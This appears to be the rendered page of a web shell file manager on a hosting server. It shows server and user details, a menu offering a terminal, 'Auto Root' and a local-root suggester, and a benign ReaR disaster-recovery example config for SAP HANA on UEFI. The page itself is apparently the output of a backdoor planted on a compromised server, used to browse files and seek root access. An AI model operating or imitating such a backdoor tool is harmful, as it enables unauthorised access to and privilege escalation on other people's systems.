Linux ih01.iridiumhosting.com 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
Server IP : 67.227.241.211 & Your IP : 216.73.216.208
Domains :
Cant Read [ /etc/named.conf ]
User : dustinhy
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
MXB /
rear /
usr /
share /
rear /
conf /
examples /
Delete
Unzip
Name
Size
Permission
Date
Action
PXE-booting-example-with-URL-style.conf
1020
B
-rw-r--r--
2026-04-01 09:39
RHEL6-NETFS-of-NBU-master-example.conf
838
B
-rw-r--r--
2026-04-01 09:39
RHEL7-ISO-Oracle-example.conf
2.77
KB
-rw-r--r--
2026-04-01 09:39
RHEL7-PPC64LE-Multipath-PXE-GRUB.conf
2.07
KB
-rw-r--r--
2026-04-01 09:39
SLE11-SLE12-SAP-HANA-UEFI-example.conf
3.02
KB
-rw-r--r--
2026-04-01 09:39
SLE11-ext3-example.conf
1.56
KB
-rw-r--r--
2026-04-01 09:39
SLE12-SP1-btrfs-example.conf
4.36
KB
-rw-r--r--
2026-04-01 09:39
SLE12-SP2-btrfs-example.conf
5.02
KB
-rw-r--r--
2026-04-01 09:39
SLE12-btrfs-example.conf
2.81
KB
-rw-r--r--
2026-04-01 09:39
USB-and-Samba-example.conf
755
B
-rw-r--r--
2026-04-01 09:39
blockclone.conf
4.69
KB
-rw-r--r--
2026-04-01 09:39
borg-example.conf
912
B
-rw-r--r--
2026-04-01 09:39
rescue-and-backup-on-same-ISO-image-example.conf
481
B
-rw-r--r--
2026-04-01 09:39
Save
Rename
# Begin example setup for SAP HANA on UEFI systems. # You must adapt "NFS.server.IP.address/path/to/rear/backup" at BACKUP_URL and also # the SAP HANA related volume groups and mount points at EXCLUDE_VG and BACKUP_PROG_EXCLUDE. # As needed you may activate USING_UEFI_BOOTLOADER SECURE_BOOT_BOOTLOADER BACKUP_OPTIONS USE_DHCLIENT. # For an example with SAN and multipath have a look at # usr/share/rear/conf/examples/RHEL7-PPC64LE-Multipath-PXE-GRUB.conf # For basic information on SLES see in its High Availability Administration Guide # the chapter "Disaster recovery with ReaR" and the support database article # https://en.opensuse.org/SDB:Disaster_Recovery # In particular note: # There is no such thing as a disaster recovery solution that "just works", see # https://en.opensuse.org/SDB:Disaster_Recovery#Inappropriate_expectations # Create the ReaR recovery system as ISO image: OUTPUT=ISO # Ensure /usr/bin/xorrisofs is used (e.g. on SLES15 the RPM package xorriso provides it) # to create a UEFI bootable ISO image of the ReaR recovery system: ISO_MKISOFS_BIN="/usr/bin/xorrisofs" # To boot the ReaR recovery system with UEFI # you may have to enforce using a UEFI bootloader: #USING_UEFI_BOOTLOADER=1 # To boot the ReaR recovery system with UEFI Secure Boot you may have to specify # the right (properly signed) first stage bootloader for Secure Boot # (e.g. on SLES15 this could be /boot/efi/EFI/sles/shim.efi): #SECURE_BOOT_BOOTLOADER="/boot/efi/EFI/sles/shim.efi" # Store the backup tar archive on an NFS server: BACKUP=NETFS # BACKUP_OPTIONS specifies the NFS mount options. # You may have to enforce using the right protocol version for the NFS server. # You may use 'mount -o nolock' to avoid that rpc.statd and rpcbind are needed: #BACKUP_OPTIONS="nfsvers=3,nolock" # Where the backup tar archive and the ReaR recovery system ISO image # will get stored into a HOSTNAME (sub)-directory. # If the NFS server is not specified via IP address but via DNS name, # DNS must work from within the ReaR recovery system: BACKUP_URL=nfs://NFS.server.IP.address/path/to/rear/backup # Only with BACKUP=NETFS: Preserve an existing HOSTNAME directory as HOSTNAME.old # (provided there is no '.lockfile' in the HOSTNAME directory): NETFS_KEEP_OLD_BACKUP_COPY=yes # SAP HANA related things are usually recreated in an additional separate step if they are broken. # Often SAP HANA related data is on remote storage (e.g. via SAN) that could still be intact # when the local system got destroyed so only what belongs to the local system should be recreated. # Exclude all SAP HANA related volume groups and mount points - adapt it to your specific HANA mount points: EXCLUDE_VG=( vgHANA-data-HC2 vgHANA-data-HC3 vgHANA-log-HC2 vgHANA-log-HC3 vgHANA-shared-HC2 vgHANA-shared-HC3 ) BACKUP_PROG_EXCLUDE+=( '/hana/*' ) # Let the ReaR recovery system run dhclient to get an IP address # instead of using the same IP address as the original system # (e.g. on SLES15 the RPM package dhcp-client provides /sbin/dhclient): #USE_DHCLIENT="yes" # End example setup for SAP HANA on UEFI systems.